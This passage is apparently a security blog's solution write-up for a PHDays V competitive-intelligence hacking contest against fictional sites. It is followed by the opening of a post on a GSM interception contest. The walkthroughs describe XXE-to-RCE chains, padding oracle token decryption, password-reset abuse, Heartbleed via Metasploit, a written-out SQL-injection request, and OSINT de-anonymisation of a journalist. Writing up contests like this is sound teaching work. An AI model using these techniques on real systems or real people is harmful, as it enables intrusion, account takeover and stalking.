class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Axg3qo9w2Iw/VZ0iJrVERBI/AAAAAAAAFQk/74wTU1eKj-Y/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="http://2.bp.blogspot.com/-Axg3qo9w2Iw/VZ0iJrVERBI/AAAAAAAAFQk/74wTU1eKj-Y/s400/10.png" width="400" /></a></div><br /><b>2.3. We need to find something to blackmail him with.</b><br />Nobody managed to crack this nut, which is quite disappointing. Want to dig up some dirt on the guy? Go to his Google account! His email life might not be breathtaking, but his search history is another story:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-v7czrH0Pt4Y/VZ0iSNcemvI/AAAAAAAAFQs/Oh-USqXnAe4/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="http://3.bp.blogspot.com/-v7czrH0Pt4Y/VZ0iSNcemvI/AAAAAAAAFQs/Oh-USqXnAe4/s400/11.png" width="400" /></a></div><br />As it turned out, the marketing director decided that cocaine was much more exciting than alcohol. Too bad, man. The correct answer is <b>cocaine</b>.<br /><br /><u>Correct answers: 0</u><br /><br /><b>2.4. Some competitors with gov support also want him in jail. Who is it?<span class="Apple-tab-span" style="white-space: pre;"> </span></b><br />This technically challenging task proved to be too much for our contestants since you first need to get an answer to the question before it. In the previous task, you could see that the director is regularly attempting to find annual reports of a certain Whoever company, which is located in the whoever.phdays.com domain. From here on it’s an easy ride:<br /><br /><ol style="text-align: left;"><li>Get api.php from robots.txt</li><li>Fuzz api.php and use popping errors to guess the parameters. Find XXE and get all source codes with it.</li><li>The results will indicate that there is the unserialize function in api.php, which gives us INSERT SQL-inj.</li><li>After successful table insertion, call unserialize in index.php (database data goes to unserialize) and, finally, get RCE.</li><li>Go to /home to find the email of the guy who owns Whoever, which is <b>wh0wh0wh0ever@gmail.com</b>.</li></ol><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">3.<span style="white-space: pre;"> </span>This time prepare the big guns. You are required to get info on the presidential administration (ussu.phdays.com)</span></b><br /><br /><b>3.1. Crawl all administration emails in order from a to z (format: <email>,<email>,<email>, ...)</b><br />The first task is easy-breezy: you just need to find out all email addresses at the Administration. Go to ussu.phdays.com/contacts.php.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Rn8WZM-HGfM/VZ0i0yx1D5I/AAAAAAAAFQ0/SOEucmcAEJY/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="http://1.bp.blogspot.com/-Rn8WZM-HGfM/VZ0i0yx1D5I/AAAAAAAAFQ0/SOEucmcAEJY/s640/12.png" width="640" /></a></div><br />You will see that there is the alias <b>administration@ussu-gov.org</b> for general requests.<br />In addition, the state department has an <b>extra MX server</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xmKiQgU3RdY/VZ0i_R7p6zI/AAAAAAAAFQ8/3AZywILuojk/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="http://4.bp.blogspot.com/-xmKiQgU3RdY/VZ0i_R7p6zI/AAAAAAAAFQ8/3AZywILuojk/s640/13.png" width="640" /></a></div><br />It looks like the government doesn’t care too much about safety of their employees — all it takes is just a couple of queries to obtain all the emails of the administration group:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-iLE8AOFPUGc/VZ0jFEhQoQI/AAAAAAAAFRE/efNLj-tHleg/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="443" src="http://1.bp.blogspot.com/-iLE8AOFPUGc/VZ0jFEhQoQI/AAAAAAAAFRE/efNLj-tHleg/s640/14.png" width="640" /></a></div><br />The correct answer is <a href="mailto:a_o.bozhidara@ussu-gov.org">a_o.bozhidara@ussu-gov.org</a>, <a href="mailto:d_b.bertil@ussu-gov.org">d_b.bertil@ussu-gov.org</a>, <a href="mailto:j_l.andrus@ussu-gov.org">j_l.andrus@ussu-gov.org</a>, <a href="mailto:j_t.zlata@ussu-gov.org">j_t.zlata@ussu-gov.org</a><br /><br /><u>Correct answers: 19</u><br /><br /><b>3.2. Get all passwords, emails in order from a to z (format: <email>:<password>,<email>:<password>,<email>:<password>, ...)</b><br />From here on things start to heat up, as Google will not be able to do all the work for you. Sitemap.xml says that there is a certain file. Here it is http://ussu.phdays.com/_logs/access.log. After some carefully studying, you may find the following curious queries:<br /><br /><span style="font-family: Courier New, Courier, monospace;">GET </span><br /><span style="font-family: Courier New, Courier, monospace;">/auth.php?action=getToken&id=26080&email=%61%5f%6f%2e%62%6f%7a%68%69%64%61%72%61%40%75%73%73%75%2d%67%6f%76%2e%6f%72%67</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">GET </span><br /><span style="font-family: Courier New, Courier, monospace;">/auth.php?action=checkToken&token=EShDVGIWwZSjS5I5BQbpDyWRNoFUzBOWNygG8j%2FYpbpZl7sGymRScloK%2Fddq9a6%2FAaSTXZedUHTkhONlvfd2kvB63E%2B6iqSjecSaQMRyQw1vzs5otj3%2BmP%2Fp%2BS1Xil%2BVqn7GZJPLgsgcXy4cLtcCsw%3D%3D</span><br /><br />Seems like the administration employee first gets some token, then validates it. If you take a closer look on the validation process, you will find out that it is easily cracked with the good ol’ Padding Oracle attacks, which means that the token may be deciphered with a modest number of queries.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-hcECr3PgTV8/VZ0kOYj_yyI/AAAAAAAAFRQ/hvCIKqdM_EM/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-hcECr3PgTV8/VZ0kOYj_yyI/AAAAAAAAFRQ/hvCIKqdM_EM/s400/15.png" width="335" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-zEsXYiwNjYE/VZ0kamkd90I/AAAAAAAAFRg/Xv0Cu8XbiLI/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://4.bp.blogspot.com/-zEsXYiwNjYE/VZ0kamkd90I/AAAAAAAAFRg/Xv0Cu8XbiLI/s400/16.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>After only 256 queries, we may claim with a 99% certainty that the algorithm implementation can be attacked. Throw in another 10 000 queries — and the token goes down completely. But you will not need this many as the password is at the very end, which means it gets deciphered first.<br /><br />Ok then, we got one password deciphered. Now what? Inserting the emails you got before that and sorting IDs consequently, we’ll get all four tokens for all users.<br /><br />Sign into one of the email accounts via Google to find another piece of insider info on price fluctuations of company stocks.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-7AvsDFNlOcU/VZ0kV2kH_4I/AAAAAAAAFRc/QKpO10-2-xU/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://3.bp.blogspot.com/-7AvsDFNlOcU/VZ0kV2kH_4I/AAAAAAAAFRc/QKpO10-2-xU/s640/17.png" width="640" /></a></div><b>The correct answer is a_o.bozhidara@ussu-gov.org:zhi37@1!,d_b.bertil@ussu-gov.org:bertiB3rt!,j_l.andrus@ussu-gov.org:Andrus331,j_t.zlata@ussu-gov.org:aata4444</b><br /><br /><u>Correct answers: 6</u><br /><br />To those of you who are interested to find out more about Padding Oracle attacks, we suggest this article:<br /><br /><a href="https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth">https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth</a><br /><br />Here are the slides about application protection from this and other attacks:<br /><br /><a href="http://www.slideshare.net/kochetkov.vladimir/hdswasm-russianproofreaded">http://www.slideshare.net/kochetkov.vladimir/hdswasm-russianproofreaded</a><br /><br /><b>3.3. Hack into Mac OS of the Administration secretary and give us # of the document printed for the president 14/05/2015.</b><br />Hacking the secretary’s Mac OS is a no brainer. Especially, if the said secretory leaves clues in the email signature, likes to store important archives in repositories, and reuses <b>the same password</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-C3_dSrAyPeM/VZ0k9w6gbHI/AAAAAAAAFRo/oBHmkRVVvr0/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="http://1.bp.blogspot.com/-C3_dSrAyPeM/VZ0k9w6gbHI/AAAAAAAAFRo/oBHmkRVVvr0/s400/18.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Wj7kqBoPySk/VZ0lCR4YdoI/AAAAAAAAFRw/mmD55-YB_Cs/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="http://1.bp.blogspot.com/-Wj7kqBoPySk/VZ0lCR4YdoI/AAAAAAAAFRw/mmD55-YB_Cs/s400/19.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Take Chainbreaker for Win32 and decipher the keychain from the repository with the help of the email password. The document number is #125_42-19.501.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DVJZ3nsS2fs/VZ0lJKJ12uI/AAAAAAAAFR4/1Ode22BlDSo/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="http://2.bp.blogspot.com/-DVJZ3nsS2fs/VZ0lJKJ12uI/AAAAAAAAFR4/1Ode22BlDSo/s640/20.png" width="640" /></a></div><br />Treat yourself to some interesting info about “<b>Promising quarterly reports for Choo Choo Roads (CHOO), Hacknetcom (HCKNT), and MiTM Mobile (MITM)</b>” getting published on May 27 at 11 a.m.<br /><br /><u>Correct answers: 3</u><br /><br /><b>3.4. Now we need to get this document. Give us a project name mentioned in it.</b><br />It’s time to delve into the administration resources once again. If you use the hint and log in as <a href="mailto:d_b.bertil@ussu-gov.org">d_b.bertil@ussu-gov.org</a>, you will find an interesting address with anonymous access via FTP in Google Cloud Printers <a href="https://www.google.com/cloudprint">https://www.google.com/cloudprint</a>. Among hundreds of documents, there lies the one you need – something about the Omnieye project.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uteDtjLhqMY/VZ0lWsUBvfI/AAAAAAAAFSA/K8TT7Lo8EHY/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-uteDtjLhqMY/VZ0lWsUBvfI/AAAAAAAAFSA/K8TT7Lo8EHY/s640/21.png" width="344" /></a></div>It also contains some <b>interesting info</b> about future stock rates and “Black Thursday”.<br /><br /><u>Correct answers: 0</u><br /><br /><b>3.5. Finally, break into an iPhone of one of the administration employees. There was some secret meeting in April. Where?</b><br />The participants failed to get to this task. Otherwise, they could possibly restore access to icloud.com using an email, password, and token to reset 2FA, which could be found in <a href="mailto:j_l.andrus@ussu-gov.org">j_l.andrus@ussu-gov.org</a>. Then you just needed to find the note about a meeting in <b>McDonalds on Pushkin Square</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-tFGTqMAlsEI/VZ0lrQbuEUI/AAAAAAAAFSI/In70c3yr2Zs/s1600/22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="http://3.bp.blogspot.com/-tFGTqMAlsEI/VZ0lrQbuEUI/AAAAAAAAFSI/In70c3yr2Zs/s400/22.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-97pQSSWIvoU/VZ0l2HWAFFI/AAAAAAAAFSQ/ST40G1Hl8kg/s1600/23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="http://3.bp.blogspot.com/-97pQSSWIvoU/VZ0l2HWAFFI/AAAAAAAAFSQ/ST40G1Hl8kg/s400/23.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">4. We need proof that the government controls Positive Times (ptimes.phdays.com)</span></b><br /><br /><i>The participants were required to gather evidence that the Positive Times media giant has been under the government’s thumb for a long time.</i><br /><br /><b>4.1. Get the journalist's (w_j.dom@ussu-gov.org) mobile number - he is a rat. Tip: he always uses two accounts for privacy in social networks. (format, no delimiters: +7xxxxxxxxx#xxxxxxx)</b><br />Once again, the first task turns out to be easy – just get the journalist’s phone number. He seems to be suffering from the multiple personalities syndrome — 2 accounts on VK.com and another 2 on FB.com. Find the first account using a password reset function on FB.com<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-uFCCj-KQVFI/VZ0l92JCPGI/AAAAAAAAFSY/ltrHn4iVNLU/s1600/24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://4.bp.blogspot.com/-uFCCj-KQVFI/VZ0l92JCPGI/AAAAAAAAFSY/ltrHn4iVNLU/s640/24.png" width="640" /></a></div>Find the vk.com one comparing names in the lists of people who liked <a href="http://ptimes.phdays.com/">ptimes.phdays.com</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-QsTZOctmDrs/VZ0mErhRzhI/AAAAAAAAFSg/gaeLYqgg3Zw/s1600/25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="http://2.bp.blogspot.com/-QsTZOctmDrs/VZ0mErhRzhI/AAAAAAAAFSg/gaeLYqgg3Zw/s640/25.png" width="640" /></a></div><br />You may see that the only one who fits is a person at <a href="https://vk.com/id304632346">https://vk.com/id304632346</a>. On his page, you will find the first part of his mobile number and his email.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ddsRfyI1gAg/VZ0mNudG0_I/AAAAAAAAFSo/v-IpeiUaSPI/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="http://1.bp.blogspot.com/-ddsRfyI1gAg/VZ0mNudG0_I/AAAAAAAAFSo/v-IpeiUaSPI/s400/26.png" width="400" /></a></div><br />If you try to restore the FB account with this email, you’ll see it’s the same guy.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-0Uemu3WNGgY/VZ0mT-CI95I/AAAAAAAAFSw/7cbMG9hE2i0/s1600/27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="http://3.bp.blogspot.com/-0Uemu3WNGgY/VZ0mT-CI95I/AAAAAAAAFSw/7cbMG9hE2i0/s400/27.png" width="400" /></a></div><br />Now, when you found his account via his FB email, take a look at the Details section, and you’ll see the missing part of the phone. The correct answer is <b>+79652843472#317</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bZsw8C6tNmE/VZ0mbUEkZ0I/AAAAAAAAFS4/lhw6QCbXZY0/s1600/28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="http://2.bp.blogspot.com/-bZsw8C6tNmE/VZ0mbUEkZ0I/AAAAAAAAFS4/lhw6QCbXZY0/s400/28.png" width="400" /></a></div><br /><i>Note</i>: We had to use “an extension number” to exclude any attempt to brute force it.<br /><br /><u>Correct answers: 34</u><br /><br /><b>4.2. Get access to the publishing engine of Positive Times. Give us user and password. (format: <email>:<password>)</b><br />Now you are required to gain access to the Positive Times portal admin panel. Let us guess. At sitemap.xml you found the list of emails reset passwords are sent to (the sentemails.log file), you even got an email with a token for password restoring, and changed password using the public inbox from the list <a href="mailto:ptimes-registration@mailinator.com">ptimes-registration@mailinator.com</a>. But this account doesn’t have a sufficient privilege level to do anything useful! Well, duh, what did you expect? Some shabby email box being used for administrative stuff? Dream on.<br /><br />However, if you take a close look at the password restoring process, you just might the see the light at the end of the tunnel: at the last stage, the system checks the email again.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-9STThNGIzHs/VZ0mmFkXquI/AAAAAAAAFTA/_udgLDkJdBI/s1600/29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="http://3.bp.blogspot.com/-9STThNGIzHs/VZ0mmFkXquI/AAAAAAAAFTA/_udgLDkJdBI/s400/29.png" width="400" /></a></div><br />Why? What if we change the email to a more privileged one from sentemails.log, say, to <a href="mailto:ptimes@ussu-gov.org">ptimes@ussu-gov.org</a>. Bingo! You receive an email with a correct password on Mailnator, and now can answer the question. As a bonus, you gain access to the admin panel with the account ptimes@ussu-gov.org:Pt1M3P@ss. Once inside, you may find out two things — the tax being raised and the government cherry picking companies.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_SyzNSDroRU/VZ0mu-qVHXI/AAAAAAAAFTI/X5ricd0c_Fw/s1600/30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://4.bp.blogspot.com/-_SyzNSDroRU/VZ0mu-qVHXI/AAAAAAAAFTI/X5ricd0c_Fw/s400/30.png" width="400" /></a></div><br />Besides insider info, this interface gives you an opportunity to change the second piece of news (so that it would work in favor of those who play against the market). Then we would have gotten it published on the second day of the contest at 11:30. Alas, either we overestimated the participants, or the fictional news just got buried under thousands of useless requests sent in attempt to exploit nonexistent XSS and SQLi.<br /><br /><u>Correct answers: 13</u><br /><br /><b>4.3. Get access to the email account of another corrupt journalist. His email is mediagov@ussu-gov.org. Give us his password.</b><br />To accomplish this task, you just needed to notice the form <a href="http://ptimes.phdays.com/feedback.php">http://ptimes.phdays.com/feedback.php</a> and with the hint from Google to realize that you may somehow upload files to the feedbackupload folder. After uncommenting the upload file field in the form and uploading the empty file .htaccess, you could obtain the feedbackupload directory listing for 5 minutes.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-HmsCXw4pkjk/VZ0nEPJqZnI/AAAAAAAAFTQ/kCYicb0DL90/s1600/31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="164" src="http://1.bp.blogspot.com/-HmsCXw4pkjk/VZ0nEPJqZnI/AAAAAAAAFTQ/kCYicb0DL90/s640/31.png" width="640" /></a></div><br />After that, it would be a piece of cake to find the file uploaded-13-05-2015.docx owned by <a href="mailto:mediagov@ussu-gov.org">mediagov@ussu-gov.org</a> in the directory and realize that all images were taken from <a href="https://188.166.78.21/">https://188.166.78.21:443/</a>. Following the MSF hint, use the Heartbleed exploit from the Metasploit pack (there were some other exploit options that would have worked as well , but not all of them) at the address and get the user password from the memory dump:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-MOiSAKzxW0g/VZ0nUjWgaDI/AAAAAAAAFTY/UFCthkt0Xpo/s1600/32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="http://4.bp.blogspot.com/-MOiSAKzxW0g/VZ0nUjWgaDI/AAAAAAAAFTY/UFCthkt0Xpo/s400/32.png" width="400" /></a></div><br />Also, don’t forget: <a href="https://www.acunetix.com/websitesecurity/Why-File-Upload-Forms-are-a-Major-Security-Threat.pdf">https://www.acunetix.com/websitesecurity/Why-File-Upload-Forms-are-a-Major-Security-Threat.pdf</a>.<br /><br />The correct answer is <b>P@S$W0_PD</b>.<br /><br /><u>Correct answers: 1</u><br /><br /><b>4.4. We found a group of hackers called PositiveLeaks. They may help us in our business. Find their leader's name for us.</b><br />Here are Wikileaks the enthusiasts that are also trying to dig something up on Positive Times. Judging from their name, they should be at pleaks.phdays.com. Also, with this request:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /userPage HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: pleaks.phdays.com</span><br /><span style="font-family: Courier New, Courier, monospace;">Cookie: PHPSESSID=rr47fgk7e2rckklqj5kgl4f6k5</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Type: multipart/form-data; boundary=---------------------------214580240818081871851160929598</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Length: 376</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">-----------------------------214580240818081871851160929598</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="template"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">123%' union select null,null,text as content from templates where '1%'='1</span><br /><span style="font-family: Courier New, Courier, monospace;">-----------------------------214580240818081871851160929598</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="action"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">createTemplate</span><br /><span style="font-family: Courier New, Courier, monospace;">-----------------------------214580240818081871851160929598--</span><br /><br />you may gain access to news templates on the site to find the answer (<b>Boris_The_Emperor</b>) and another piece of intel.<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XKQIwgl40_w/VZ0oGCGFKfI/AAAAAAAAFTo/cc_OrGdtzEw/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="http://2.bp.blogspot.com/-XKQIwgl40_w/VZ0oGCGFKfI/AAAAAAAAFTo/cc_OrGdtzEw/s400/33.png" width="400" /></a></div><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">5. The stock exchange market financial director was incriminated, but there was no evidence. Help to get him in jail.</span></b><br /><br />Finally, you need to help justice and throw in jail the stock market financial director.<br /><br /><b>5.1. His name is Prabhat SAVITR. First, we need to find what gov got on him. Find his case ID.</b><br />Sounds familiar to those who played Competitive Intelligence before. There is a relation between the case IDs and photo IDs, and you may get the photo ID of the guy you need thanks to the directory listing.<br /> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Nhq1Azg4tLA/VZ0oMjvsu8I/AAAAAAAAFTw/u-awEqPNW6E/s1600/34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="http://3.bp.blogspot.com/-Nhq1Azg4tLA/VZ0oMjvsu8I/AAAAAAAAFTw/u-awEqPNW6E/s400/34.png" width="400" /></a></div>This time we added a salt to md5(id): just do your homework in the md5 public databases, and you’ll find it — <b>Chipp37</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WUDAqoajDIA/VZ0oXGoa0sI/AAAAAAAAFUA/FGj00O7bcKE/s1600/36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://4.bp.blogspot.com/-WUDAqoajDIA/VZ0oXGoa0sI/AAAAAAAAFUA/FGj00O7bcKE/s400/36.png" width="400" /></a></div><br />That means the answer must be <b>case-id=md5(Chipp371337)= 8bc875dbed7b0ecd966bed3c8ec750fa</b><br /><br /><u>Correct answers: 39</u><br /><br /><b>5.2. There was no evidence that the financial director was at the crime scene. We can blackmail him if we know deviceid and iccid of his phone and SIM. Get them for us (format deviceid;iccid)</b><br />DeviceId may be easily found in the case documents. You may download them by entering the ID from the last task into the form http://ussu.phdays.com/getdocument.php. To get iccid, you need to google the deviceid substring. The correct answer is <b>a94360c365ab38810639911d355103c86367d5ba;897019903020414671</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ZA17l1Hnzys/VZ0oj5sRMtI/AAAAAAAAFUI/00cJt1j6sDs/s1600/37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="http://2.bp.blogspot.com/-ZA17l1Hnzys/VZ0oj5sRMtI/AAAAAAAAFUI/00cJt1j6sDs/s400/37.png" width="400" /></a></div><br /><br /><u>Correct answers: 3</u><br /><u><br /></u><b>5.3. Where is the director hiding now? We need to know the city.</b><br />Unfortunately, the players managed to get to this task only by the end of the second day, so no one was able to do it right. Yet there was one team who brute forced the answer. In reality, what we wanted you to do is to use XSS to penetrate the page’s DOM the victim visits all the time (with the help of the input data obtained in the previous challenge). From the logs it was obvious that he uses a 3G modem manufactured by some mystery firm named OiWei. Gain access to web pages on the modem located at 192.168.44.1 thanks to the headers Access-Control-Allow-Origin: * sent by the modem. This would allow to capture cellid and other data to find out the director’s location — <b>Hamilton</b>.<br /><br /><u>Correct answers: 1</u><br /><br /><b>5.4. As you know by now, the stock market has a backdoor for executives. Give us the private key (Private-MAC for proof would be enough)</b><br />Apart from the location, you may retrieve the stock market backend address from the modem. We hoped that it would be enough to exploit 0 day in PHP to bypass openbasedir and read the contents of the key in <b>/home</b>. But alas.<br /><br /><u>Correct answers: 0</u><br /><br /><b><span style="font-size: large;">Summary</span></b><br /><br />51 participants were not able to answer a single question.<br /><br />The first place went to djecka – he was the first one who managed to give right answers to 9 questions.<br /><br />The top team was rdot — they cracked 12 tasks.<br /><br /><style type="text/css">.tg {border-collapse:collapse;border-spacing:0;} .tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;} .tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;} </style> <table class="tg"> <tbody><tr> <th class="tg-031e">1</th> <th class="tg-031e">djecka</th> <th class="tg-031e">1700</th> </tr><tr> <td class="tg-031e">2</td> <td class="tg-031e">sharsil</td> <td class="tg-031e">1700</td> </tr><tr> <td class="tg-031e">3</td> <td class="tg-031e">MZC</td> <td class="tg-031e">1600</td></tr></tbody></table></div>Unknownnoreply@blogger.com435tag:blogger.com,1999:blog-5176771794789502609.post-43845841283805467952015-07-03T14:18:00.001+03:002015-07-03T14:18:49.178+03:00The MiTM Mobile Contest: GSM Network Down at PHDays V<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LqksqismI7w/VZZqrecJvXI/AAAAAAAAFIQ/vlnS8ruLWrY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="http://2.bp.blogspot.com/-LqksqismI7w/VZZqrecJvXI/AAAAAAAAFIQ/vlnS8ruLWrY/s640/1.png" width="640" /></a></div><br />Although we have published several research works on <a href="http://blog.ptsecurity.com/2014/08/cell-phone-tapping-how-it-is-done-and.html">cell phone tapping</a>, <a href="http://blog.ptsecurity.com/2015/01/mobile-eavesdropping-via-ss7-and-first.html">SMS interception</a>, <a href="http://blog.ptsecurity.com/2014/04/search-and-neutralize-how-to-determine.html">subscriber tracking</a>, and <a href="http://blog.ptsecurity.com/2014/12/4g-security-hacking-usb-modem-and-sim.html">SIM card cracking</a>, lots of our readers still regard those stories as some kind of magic used only by intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants realize how easily an attacker can conduct the above-mentioned attacks having only a 10$ cell phone with some hacker freeware.<br /><a name='more'></a><br /><span style="font-size: large;"><b>Contest conditions and technologies</b></span><br /><blockquote class="tr_bq">You've got a corporate cell phone of a MiTM Mobile network user.<br />Through the DarkNet you have obtained some information that can be useful:</blockquote><blockquote class="tr_bq">1) The codes for publes (PHDays game currency – Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant — 10000. </blockquote><blockquote class="tr_bq">2) The financial director is missing, nobody can get him on the phone for several days, his cell phone is turned off, but he is still getting passwords. </blockquote><blockquote class="tr_bq">3) You can obtain key information by calling the number 2000, but there is authorization by the caller's number. We also managed to find out the phone number of the director's private secretary — 77777. He must have the access. </blockquote><blockquote class="tr_bq">There are other numbers in the network through which some employees get important information, but, unfortunately, we failed to find them. Besides, don't forget — you can always come across someone's private information in the corporate network.</blockquote>The CTF participants got about the same intro at the MiTM Mobile contest held at PHDays V.<br /><br />We deployed a real mobile operator infrastructure for the contest. It included a base station, cell phones, landline phones, and SIM cards. The name of the contest — MiTM Mobile — was picked for a reason: we wanted to emphasize the vulnerability of our network. For the logo, we chose the Kraken (well, kind of) destroying a cell tower.<br /><br />So, it's all clear with the operator's trappings, let's now look at the network implementation. Our hardware solution was a device with a simple name — UmTRX (the manufacturer's site: umtrx.org/hardware). The network's wireless part was based on this unit. The functionality of the base station and GSM (software part) was implemented through the Osmocom/OpenBTS stack.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-J0-UNhGhtmU/VZZrZzL921I/AAAAAAAAFIY/9RXgTKjjCvU/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-J0-UNhGhtmU/VZZrZzL921I/AAAAAAAAFIY/9RXgTKjjCvU/s640/2.png" width="420" /></a></div><br /><div style="text-align: center;"><i>UmTRX is the heart of MiTM Mobile.<span class="Apple-tab-span" style="white-space: pre;"> </span></i></div><br />We also ordered SIM cards for a simple and quick network registration. The MiTM Mobile network credentials were specified in them, and the card data were registered in the network. In order to simplify air tapping and make the life of the players easier we disabled data encryption in our network (A5/0). Apart from the SIM cards, the participants were provided with Motorola C118 cell phones and USB-UART cables (CP2102). All this, including the osmocombb stack, allowed the participants to tap the air, intercept SMS messages intended for other users, and make phone calls in the network on the part of another user.<br /><br />Each team got a SIM card, cable, cell phone, and virtual machine image with the osmocombb stack build to experiment with.<br /><br /><div class="separator" style="clear: both; text-align: 